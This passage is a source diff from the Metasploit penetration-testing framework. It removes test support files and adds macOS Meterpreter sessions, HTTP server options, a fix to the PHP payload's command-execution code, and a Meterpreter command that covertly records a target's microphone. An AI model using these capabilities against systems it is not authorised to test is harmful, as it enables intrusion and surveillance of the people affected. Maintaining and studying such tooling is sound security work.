-#     # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
-#     # of overwriting each other as 'Cucumber Features'
-#     set_env('SIMPLECOV_COMMAND_NAME', command_name)
-#
-#     simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
-#     # set environment variable so child processes will merge their coverage data with parent process's coverage data.
-#     set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
-#   end
-#
-#   Before('@db') do |scenario|
-#     dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
-#     ActiveRecord::Base.establish_connection(dbconfig["test"])
-#   end
-# end

features/support/simplecov_setup.rb

@@ -1,16 +0,0 @@
-# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
-
-simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
-
-# will not be set if hook does not run because `bundle install --without coverage`
-if simplecov_command_name
-  require 'simplecov'
-
-  require 'pathname'
-
-  root = Pathname(__FILE__).expand_path.parent.parent.parent
-
-  SimpleCov.command_name(simplecov_command_name)
-  SimpleCov.root(root)
-  load root.join('.simplecov')
-end

features/support/stty.rb

@@ -1,11 +0,0 @@
-require 'pathname'
-
-support = Pathname.new(__FILE__).realpath.parent
-
-paths = [
-    # adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
-    # output.
-    support.join('bin').to_path,
-    ENV['PATH']
-]
-ENV['PATH'] = paths.join(File::PATH_SEPARATOR)

features/support/targets.yml.example

@@ -1,7 +0,0 @@
-windows:
-  -
-    hostname: wxpsp0
-    ip: 127.0.0.100
-  -
-    hostname: wxpsp2
-    ip: 127.0.0.101

lib/metasploit/framework/database/cucumber.rb

@@ -1,36 +0,0 @@
-require 'metasploit/framework/database'
-
-module Metasploit::Framework::Database::Cucumber
-  def self.project_configurations_path
-    Rails.root.join('config', 'database.yml').to_path
-  end
-
-  def self.backup_project_configurations
-    if File.exist?(project_configurations_path)
-      # assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
-      # just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
-      if File.exist?(backup_project_configurations_path)
-        File.delete(project_configurations_path)
-      else
-        # project contains the real database.yml and there was no previous, aborted run.
-        File.rename(project_configurations_path, backup_project_configurations_path)
-      end
-    end
-  end
-
-  def self.backup_project_configurations_path
-    "#{project_configurations_path}.cucumber.bak"
-  end
-
-  def self.restore_project_configurations
-    if File.exist?(backup_project_configurations_path)
-      if File.exist?(project_configurations_path)
-        # Remove fake, leftover database.yml
-        File.delete(project_configurations_path)
-      end
-
-      File.rename(backup_project_configurations_path, project_configurations_path)
-    end
-  end
-end
-

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "4.15.1"
+      VERSION = "4.15.4"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/base/sessions/command_shell_options.rb

@@ -4,7 +4,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 ##
 
 

lib/msf/base/sessions/meterpreter_x64_osx.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_X64
+  end
+end
+
+end
+end
+

lib/msf/base/sessions/meterpreter_x86_osx.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'osx'
+    self.base_arch = ARCH_X86
+  end
+end
+
+end
+end
+

lib/msf/core/auxiliary/web/analysis/differential.rb

@@ -3,7 +3,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 ##
 
 module Msf

lib/msf/core/auxiliary/web/analysis/taint.rb

@@ -3,7 +3,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 ##
 
 module Msf

lib/msf/core/auxiliary/web/analysis/timing.rb

@@ -3,7 +3,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 ##
 
 module Msf

lib/msf/core/auxiliary/web/form.rb

@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 
 require 'net/https'
 require 'net/http'

lib/msf/core/auxiliary/web/fuzzable.rb

@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 
 require 'net/https'
 require 'net/http'

lib/msf/core/auxiliary/web/http.rb

@@ -3,7 +3,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 ##
 
 require 'uri'

lib/msf/core/auxiliary/web/path.rb

@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 
 require 'net/https'
 require 'net/http'

lib/msf/core/auxiliary/web/target.rb

@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 
 require 'net/https'
 require 'net/http'

lib/msf/core/exploit/browser_autopwn.rb

@@ -3,7 +3,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 
 require 'msf/core/auxiliary'
 

lib/msf/core/exploit/browser_autopwn2.rb

@@ -810,6 +810,7 @@ module Msf
 
       %Q|<html>
       <head>
+      <meta http-equiv="cache-control" content="no-cache" />
       <script>
       #{js}
       </script>

lib/msf/core/exploit/http/server.rb

@@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer
 
     register_evasion_options(
       [
+        OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]),
         OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
         OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
         OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
@@ -42,7 +43,8 @@ module Exploit::Remote::HttpServer
 
     register_advanced_options([
       OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']),
-      OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)'])
+      OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)']),
+      OptBool.new('SendRobots', [false, 'Return a robots.txt file if asked for one', false])
     ])
 
     # Used to keep track of resources added to the service manager by
@@ -179,7 +181,26 @@ module Exploit::Remote::HttpServer
       print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
     end
 
+    if datastore['SendRobots']
+      add_robots_resource
+    end
+
     add_resource(uopts)
+
+  end
+
+  def add_robots_resource
+    proc = Proc.new do |cli, req|
+      self.cli = cli
+      send_robots(cli, req)
+    end
+
+    vprint_status('Adding hardcoded URI /robots.txt')
+    begin
+      add_resource('Path' => '/robots.txt', 'Proc' => proc)
+    rescue RuntimeError => e
+      print_warning(e.message)
+    end
   end
 
   # Set {#on_request_uri} to handle the given +uri+ in addition to the one
@@ -558,6 +579,10 @@ module Exploit::Remote::HttpServer
       response.headers.junk_headers = 1
     end
 
+    if datastore['HTTP::no_cache']
+      response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate'
+    end
+
     headers.each_pair { |k,v| response[k] = v }
 
     cli.send_response(response)
@@ -605,6 +630,22 @@ module Exploit::Remote::HttpServer
     cli.send_response(resp_404)
   end
 
+  #
+  # Sends a canned robots.txt file
+  #
+  def send_robots(cli, request)
+    print_status('Sending robots.txt')
+    robots = create_response(200, 'Success')
+    robots['Content-Type'] = 'text/plain'
+
+    robots.body = %Q{\
+User-agent: *
+Disallow: /
+}
+
+    cli.send_response(robots)
+  end
+
 
   #
   # Returns the configured (or random, if not configured) URI path

lib/msf/core/exploit/mysql.rb

@@ -4,7 +4,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# https://metasploit.com/framework/
 ##
 
 ###

lib/msf/core/exploit/smtp_deliver.rb

@@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver
 
     raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock)
     res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock)
-    if res[0..2] == '250'
+    if res && res[0..2] == '250'
       resp = raw_send_recv("DATA\r\n", nsock)
 
       # If the user supplied a Date field, use that, else use the current
@@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver
       # to dump it all.
       vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}")
     end
-
+    begin
-    nsock.put(cmd)
+      nsock.put(cmd)
-    res = nsock.get_once
+      res = nsock.get_once
-
+    rescue
+      return nil
+    end
     # Don't truncate the server output because it might be helpful for
     # debugging.
     vprint_status("S: #{res.strip}") if res

lib/msf/core/modules/loader/base.rb

@@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base
       true
     }
 
-    loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module)
+    loaded = namespace_module_transaction(type + "/" + module_reference_name,
+      :reload => reload, &try_eval_module)
     unless loaded
       return false
     end

lib/msf/core/modules/loader/directory.rb

@@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
   def each_module_reference_name(path, opts={})
     whitelist = opts[:whitelist] || []
     ::Dir.foreach(path) do |entry|
+
       full_entry_path = ::File.join(path, entry)
       type = entry.singularize
 
-      unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
+      next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
-        next
-      end
 
       full_entry_pathname = Pathname.new(full_entry_path)
 
@@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
           entry_descendant_pathname = Pathname.new(entry_descendant_path)
           relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
           relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
+          next if File::basename(relative_entry_descendant_path) == "example.rb"
 
           # The module_reference_name doesn't have a file extension
           module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)

lib/msf/core/payload/php.rb

@@ -103,7 +103,7 @@ module Msf::Payload::Php
       }else"
     proc_open = "
       if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){
-        $handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
+        $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
         #{output}=NULL;
         while(!feof($pipes[1])){
           #{output}.=fread($pipes[1],1024);

lib/msf/core/post/hardware/rftransceiver/rftransceiver.rb

@@ -278,6 +278,16 @@ module RFTransceiver
     return_success(r)
   end
 
+  #
+  # Sets lowball.  Ensure you set the frequency first before using this
+  # @return [Boolean] success value
+  def set_lowball
+    return false unless is_rf?
+    self.index ||= 0
+    r = client.rftransceiver.set_lowball(self.index)
+    return_success(r)
+  end
+
   #
   # Set power level
   # @param level [Integer] Power level

lib/msf/util.rb

@@ -21,3 +21,4 @@ end
 
 # Executable generation and encoding
 require 'msf/util/exe'
+require 'msf/util/helper'

lib/msf/util/exe.rb

@@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender'
   # @return           [String]
   # @return           [NilClass]
   def self.to_executable(framework, arch, plat, code = '', opts = {})
-    if elf? code
+    if elf? code or macho? code
       return code
     end
 
@@ -2148,15 +2148,19 @@ require 'msf/core/exe/segment_appender'
         end
       end
     when 'macho', 'osx-app'
-      macho = case arch
+      if macho? code
-      when ARCH_X86,nil
+        macho = code
-        to_osx_x86_macho(framework, code, exeopts)
+      else
-      when ARCH_X64
+        macho = case arch
-        to_osx_x64_macho(framework, code, exeopts)
+        when ARCH_X86,nil
-      when ARCH_ARMLE
+          to_osx_x86_macho(framework, code, exeopts)
-        to_osx_arm_macho(framework, code, exeopts)
+        when ARCH_X64
-      when ARCH_PPC
+          to_osx_x64_macho(framework, code, exeopts)
-        to_osx_ppc_macho(framework, code, exeopts)
+        when ARCH_ARMLE
+          to_osx_arm_macho(framework, code, exeopts)
+        when ARCH_PPC
+          to_osx_ppc_macho(framework, code, exeopts)
+        end
       end
       fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
     when 'vba'
@@ -2284,6 +2288,10 @@ require 'msf/core/exe/segment_appender'
     code[0..3] == "\x7FELF"
   end
 
+  def self.macho?(code)
+    code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" 
+  end
+
 end
 end
 end

lib/msf/util/helper.rb

@@ -0,0 +1,21 @@
+# -*- coding: binary -*-
+
+module Msf
+module Util
+class Helper
+  # Cross-platform way of finding an executable in the $PATH.
+  #
+  #   which('ruby') #=> /usr/bin/ruby
+  def self.which(cmd)
+    exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : ['']
+    ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
+      exts.each { |ext|
+        exe = File.join(path, "#{cmd}#{ext}")
+        return exe if File.executable?(exe) && !File.directory?(exe)
+      }
+    end
+    return nil
+  end
+end
+end
+end

lib/rex/parser/fs/bitlocker.rb

@@ -4,7 +4,7 @@ require 'openssl/ccm'
 require 'metasm'
 
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb

@@ -186,6 +186,10 @@ class RFTransceiver < Extension
     client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}")
   end
 
+  def set_lowball(idx)
+    client.send_request("/rftransceiver/#{idx}/set_lowball")
+  end
+
   def set_maxpower(idx)
     client.send_request("/rftransceiver/#{idx}/set_maxpower")
   end

lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb

@@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver
       'deviation'         => 'sets the deviation',
       'sync_word'         => 'sets the sync word',
       'preamble'          => 'sets the preamble number',
+      'lowball'           => 'sets lowball',
       'power'             => 'sets the power level',
       'maxpower'          => 'sets max power'
     }
@@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver
     print_success(r)
   end
 
+  def cmd_lowball_help
+    print_line("Lowball is frequency dependent.  Set frequency first")
+  end
+
+  def cmd_lowball(*args)
+    self.idx ||= 0
+    if args.length.positive?
+      cmd_lowball_help
+      return
+    end
+    r = client.rftransceiver.set_lowball(idx)
+    print_success(r)
+  end
+
   def cmd_maxpower_help
     print_line("Max power is frequency dependent.  Set frequency first")
   end

lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb

@@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir
   # Downloads the contents of a remote directory a
   # local directory, optionally in a recursive fashion.
   #
-  def Dir.download(dst, src, opts, force = true, glob = nil, &stat)
+  def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat)
-    recursive = false
-    continue = false
-    tries = false
-    tries_no = 0
     tries_cnt = 0
-    if opts
+
-      timestamp = opts["timestamp"]
+    continue =  opts["continue"]
-      recursive = true if opts["recursive"]
+    recursive = opts["recursive"]
-      continue = true if opts["continue"]
+    timestamp = opts["timestamp"]
-      tries = true if opts["tries"]
+    tries_no = opts["tries_no"] || 0
-      tries_no = opts["tries_no"]
+    tries = opts["tries"]
-    end
+
     begin
       dir_files = self.entries(src, glob)
     rescue Rex::TimeoutError

lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb

@@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
   # If a block is given, it will be called before each file is downloaded and
   # again when each download is complete.
   #
-  def File.download(dest, src_files, opts = nil, &stat)
+  def File.download(dest, src_files, opts = {}, &stat)
-    timestamp = opts["timestamp"] if opts
+    timestamp = opts["timestamp"]
     [*src_files].each { |src|
       if (::File.basename(dest) != File.basename(src))
         # The destination when downloading is a local file so use this
@@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
   #
   # Download a single file.
   #
-  def File.download_file(dest_file, src_file, opts = nil, &stat)
+  def File.download_file(dest_file, src_file, opts = {}, &stat)
-    continue=false
-    tries=false
-    tries_no=0
     stat ||= lambda { |a,b,c| }
 
-    if opts
+    adaptive = opts["adaptive"]
-      continue = true if opts["continue"]
+    block_size = opts["block_size"] || 1024 * 1024
-      adaptive = true if opts['adaptive']
+    continue = opts["continue"]
-      tries = true if opts["tries"]
+    tries_no = opts["tries_no"]
-      tries_no = opts["tries_no"]
+    tries = opts["tries"]
-    end
+
     src_fd = client.fs.file.new(src_file, "rb")
 
     # Check for changes
@@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
     end
 
     # Keep transferring until EOF is reached...
-    block_size = (opts && opts['block_size']) || 1024 * 1024
     begin
       if tries
         # resume when timeouts encountered

lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb

@@ -0,0 +1,62 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/channel'
+require 'rex/post/meterpreter/channels/pools/stream_pool'
+
+module Rex
+  module Post
+    module Meterpreter
+      module Extensions
+        module Stdapi
+          module Mic
+
+            ###
+            #
+            # This meterpreter extension can list and capture from microphone
+            #
+            ###
+            class Mic
+              def initialize(client)
+                @client = client
+              end
+
+              def session
+                @client
+              end
+
+              # List available microphones
+              def mic_list
+                response = client.send_request(Packet.create_request('audio_mic_list'))
+                names = []
+                if response.result == 0
+                  response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv|
+                    names << tlv.value
+                  end
+                end
+                names
+              end
+
+              # Starts recording audio from microphone
+              def mic_start(device_id)
+                request = Packet.create_request('audio_mic_start')
+                request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id)
+                response = client.send_request(request)
+                return nil unless response.result == 0
+
+                channel = Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS)
+              end
+
+              # Stop recording from microphone
+              def mic_stop
+                client.send_request(Packet.create_request('audio_mic_stop'))
+                true
+              end
+
+              attr_accessor :client
+            end
+          end
+        end
+      end
+    end
+  end
+end

lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb

@@ -19,6 +19,7 @@ require 'rex/post/meterpreter/extensions/stdapi/sys/power'
 require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun'
 require 'rex/post/meterpreter/extensions/stdapi/ui'
 require 'rex/post/meterpreter/extensions/stdapi/webcam/webcam'
+require 'rex/post/meterpreter/extensions/stdapi/mic/mic'
 
 module Rex
 module Post
@@ -83,6 +84,10 @@ class Stdapi < Extension
           'name' => 'webcam',
           'ext'  => Rex::Post::Meterpreter::Extensions::Stdapi::Webcam::Webcam.new(client)
         },
+        {
+          'name' => 'mic',
+          'ext'  => Rex::Post::Meterpreter::Extensions::Stdapi::Mic::Mic.new(client)
+        },
         {
           'name' => 'ui',
           'ext'  => UI.new(client)

lib/rex/post/meterpreter/extensions/stdapi/tlv.rb

@@ -249,8 +249,10 @@ TLV_TYPE_WEBCAM_NAME        = TLV_META_TYPE_STRING  | (TLV_EXTENSIONS + 4)
 #
 ##
 
-TLV_TYPE_AUDIO_DURATION     = TLV_META_TYPE_UINT    | (TLV_EXTENSIONS + 1)
+TLV_TYPE_AUDIO_DURATION       = TLV_META_TYPE_UINT    | (TLV_EXTENSIONS + 10)
-TLV_TYPE_AUDIO_DATA         = TLV_META_TYPE_RAW     | (TLV_EXTENSIONS + 2)
+TLV_TYPE_AUDIO_DATA           = TLV_META_TYPE_RAW     | (TLV_EXTENSIONS + 11)
+TLV_TYPE_AUDIO_INTERFACE_ID   = TLV_META_TYPE_UINT    | (TLV_EXTENSIONS + 12)
+TLV_TYPE_AUDIO_INTERFACE_NAME = TLV_META_TYPE_STRING  | (TLV_EXTENSIONS + 13)
 
 end; end; end; end; end
 

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb

@@ -18,6 +18,7 @@ class Console::CommandDispatcher::Stdapi
   require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys'
   require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui'
   require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic'
 
   Klass = Console::CommandDispatcher::Stdapi
 
@@ -28,6 +29,7 @@ class Console::CommandDispatcher::Stdapi
       Klass::Sys,
       Klass::Ui,
       Klass::Webcam,
+      Klass::Mic
     ]
 
   include Console::CommandDispatcher

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb

@@ -0,0 +1,201 @@
+class Mic
+end# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+require 'bindata'
+
+module Rex
+  module Post
+    module Meterpreter
+      module Ui
+
+        ###
+        #
+        # Mic - Capture audio from the remote system
+        #
+        ###
+        class Console::CommandDispatcher::Stdapi::Mic
+          Klass = Console::CommandDispatcher::Stdapi::Mic
+
+          include Console::CommandDispatcher
+
+          #
+          # List of supported commands.
+          #
+          def commands
+            all = {
+              'mic_start' => 'start capturing an audio stream from the target mic',
+              'mic_stop'  => 'stop capturing audio',
+              'mic_list'  => 'list all microphone interfaces',
+              'listen'    => 'listen to a saved audio recording via audio player'
+            }
+            reqs = {
+              'mic_start' => [ 'audio_mic_start' ],
+              'mic_stop'  => [ 'audio_mic_stop' ],
+              'mic_list'  => [ 'audio_mic_list' ],
+              'listen'    => [ 'audio_mic_start' ]
+            }
+
+            filter_commands(all, reqs)
+          end
+
+          #
+          # Name for this dispatcher
+          #
+          def name
+            "Stdapi: Mic"
+          end
+
+          def cmd_mic_list
+            client.mic.mic_list
+            if client.mic.mic_list.length == 0
+              print_error("No mics were found")
+              return
+            end
+
+            client.mic.mic_list.each_with_index do |name, indx|
+              print_line("#{indx + 1}: #{name}")
+            end
+          end
+
+          def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:)
+            subchunk1_size = 16
+            chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size)
+            byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8
+            block_align = num_channels * bits_per_sample / 8
+
+            [
+              BinData::Int32be.new(0x52494646),      # ChunkID: "RIFF"
+              BinData::Int32le.new(chunk_size),      # ChunkSize
+              BinData::Int32be.new(0x57415645),      # Format: "WAVE"
+              BinData::Int32be.new(0x666d7420),      # SubChunk1ID: "fmt "
+              BinData::Int32le.new(16),              # SubChunk1Size
+              BinData::Int16le.new(1),               # AudioFormat
+              BinData::Int16le.new(num_channels),    # NumChannels
+              BinData::Int32le.new(sample_rate_hz),  # SampleRate
+              BinData::Int32le.new(byte_rate),       # ByteRate
+              BinData::Int16le.new(block_align),     # BlockAlign
+              BinData::Int16le.new(bits_per_sample), # BitsPerSample
+              BinData::Int32be.new(0x64617461),      # SubChunk2ID: "data"
+              BinData::Int32le.new(data_size)        # SubChunk2Size
+            ]
+          end
+
+          def cmd_mic_start(*args)
+            get_data = lambda do |channel, file|
+              data = channel.read(65536)
+              if data
+                ::File.open(file, 'a') do |f|
+                  f.write(data)
+                end
+                return data.length
+              end
+              return 0
+            end
+            device_id = 1
+            duration = 1800
+            saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav"
+
+            mic_start_opts = Rex::Parser::Arguments.new(
+              "-h" => [ false, "Help Banner" ],
+              "-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min
+              "-m" => [ true, "Microphone device index to record from (1: system default)" ],
+              "-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ]
+            )
+
+            mic_start_opts.parse(args) do |opt, _idx, val|
+              case opt
+              when "-h"
+                print_line("Usage: mic_start [options]\n")
+                print_line("Streams and records audio from the target microphone.")
+                print_line(mic_start_opts.usage)
+                return
+              when "-d"
+                duration = val.to_i
+              when "-m"
+                device_id = val.to_i
+              when "-s"
+                saved_audio_path = val
+              end
+            end
+
+            mic_list = client.mic.mic_list
+            if mic_list.length == 0
+              print_error("Target does not have a mic")
+              return
+            end
+            if device_id < 1 || device_id > mic_list.length
+              print_error("Target does not have a mic with an id of #{device_id}")
+              return
+            end
+
+            channel = client.mic.mic_start(device_id)
+            if channel.nil?
+              print_error("Mic failed to start streaming.")
+              return
+            end
+            print_status("Saving to audio file: #{saved_audio_path}")
+            print_status("Streaming started...")
+            total_data_len = 0
+            begin
+              ::File.open(saved_audio_path, 'wb') do |outfile|
+                audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each {
+                  |e| e.write(outfile)
+                }
+              end
+              ::Timeout.timeout(duration) do
+                while client do
+                  Rex::sleep(0.5)
+                  total_data_len += get_data.call(channel, saved_audio_path)
+                end
+              end
+            rescue ::Timeout::Error
+            ensure
+              total_data_len += get_data.call(channel, saved_audio_path)
+              client.mic.mic_stop
+              print_status("Streaming stopped.")
+              # Now that we know the actual length of data, update the file header.
+              ::File.open(saved_audio_path, 'rb+') do |outfile|
+                outfile.seek(0, ::IO::SEEK_SET)
+                audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each {
+                  |e| e.write(outfile)
+                }
+              end
+            end
+          end
+
+          def cmd_listen(*args)
+            filename = nil
+
+            listen_opts = Rex::Parser::Arguments.new(
+              "-h" => [ false, "Help Banner" ],
+              "-f" => [ true, "audio filename" ]
+            )
+
+            listen_opts.parse(args) do |opt, _idx, val|
+              case opt
+              when "-h"
+                print_line("Usage: listen -f <filename>\n")
+                print_line("Plays saved audio from a file.")
+                print_line(listen_opts.usage)
+                return
+              when "-f"
+                filename = val
+              end
+            end
+
+            if filename.nil?
+              print_error("use '-f' option to provide a filename for playback")
+              return
+            end
+
+            Rex::Compat.play_sound(::File.expand_path(filename))
+          end
+
+          def cmd_mic_stop
+            client.mic.mic_stop
+          end
+        end
+      end
+    end
+  end
+end

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

@@ -259,7 +259,7 @@ class Console::CommandDispatcher::Stdapi::Sys
         print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
         cmd_execute("-f", path, "-c", "-H", "-i")
       end
-    when 'linux'
+    when 'linux', 'osx'
       # Don't expand_path() this because it's literal anyway
       path = "/bin/sh"
       cmd_execute("-f", path, "-c", "-i")

lib/tasks/cucumber.rake

@@ -1,74 +0,0 @@
-# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
-# It is recommended to regenerate this file in the future when you upgrade to a 
-# newer version of cucumber-rails. Consider adding your own code to a new file 
-# instead of editing this one. Cucumber will automatically load all features/**/*.rb
-# files.
-
-
-unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
-
-vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
-$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
-
-begin
-  require 'cucumber/rake/task'
-
-  namespace :cucumber do
-    Cucumber::Rake::Task.new({:ok => 'db:test:prepare'}, 'Run features that should pass') do |t|
-      t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
-      t.fork = true # You may get faster startup if you set this to false
-      t.profile = 'default'
-    end
-
-    Cucumber::Rake::Task.new({:wip => 'db:test:prepare'}, 'Run features that are being worked on') do |t|
-      t.binary = vendored_cucumber_bin
-      t.fork = true # You may get faster startup if you set this to false
-      t.profile = 'wip'
-    end
-
-    Cucumber::Rake::Task.new({:rerun => 'db:test:prepare'}, 'Record failing features and run only them if any exist') do |t|
